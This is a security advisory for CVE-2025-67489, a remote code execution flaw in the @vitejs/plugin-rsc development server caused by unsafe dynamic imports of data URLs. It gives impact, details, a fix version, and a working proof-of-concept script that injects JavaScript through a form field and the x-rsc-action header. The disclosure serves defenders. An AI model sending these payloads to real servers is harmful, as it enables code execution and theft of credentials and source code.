CVE-2025-67489
@vitejs/plugin-rsc Remote Code Execution through unsafe dynamic imports in RSC server function APIs on development server
Description
## Summary Arbitrary Remote Code Execution on development server via unsafe dynamic imports in `@vitejs/plugin-rsc` server function APIs (`loadServerAction`, `decodeReply`, `decodeAction`) when integrated into RSC applications that expose server function endpoints. ## Impact Attackers with network access to the development server can execute arbitrary JavaScript code with Node.js privileges, allowing them to read/modify files, exfiltrate sensitive data (source code, environment variables, credentials), or pivot to other internal services. While this affects development servers only, the risk increases when using `vite --host` to expose the server on all network interfaces. ## Details In the example RSC application provided in Proof of Concept, the server handles server function call through API such as `loadServerAction`, `decodeReply`, `decodeAction` with http request's header and body as inputs: https://github.com/vitejs/vite-plugin-react/blob/c8af971f57f12d0190d7fd8829a429f5e4112f60/packages/plugin-rsc/examples/starter/src/framework/entry.rsc.tsx#L42-L47 During development, these API internally relies on dynamic import to load server function module, which allows executing arbitrary module including data url module. https://github.com/vitejs/vite-plugin-react/blob/c8af971f57f12d0190d7fd8829a429f5e4112f60/packages/plugin-rsc/src/rsc.tsx#L19-L24 ## Proof of Concept The example app is avialable in - https://github.com/vitejs/vite-plugin-react/tree/main/packages/plugin-rsc/examples/starter - https://stackblitz.com/edit/github-rubfqp9k?file=poc.js **Reproduction Steps:** - Stat development server `vite dev` - Run a following script `node poc.js` - See "REMOTE CODE EXECUTION1" and "REMOTE CODE EXECUTION2" in server console ```js // [poc.js] const payload = { 0: ["$F1"], 1: { id: "data:text/javascript,console.log('REMOTE CODE EXECUTION 1')# " }, }; const fd = new FormData(); for (const key in payload) { fd.append(key, JSON.stringify(payload[key])); } const serverUrl = process.argv[2] || 'http://localhost:5173/_.rsc'; const response = fetch(serverUrl, { method: "POST", headers: { "x-rsc-action": "data:text/javascript,console.log('REMOTE CODE EXECUTION 2')# ", }, body: fd, }) ```
How to fix CVE-2025-67489
To remediate CVE-2025-67489, upgrade the affected package to a fixed version below.
- —upgrade to 0.5.6 or later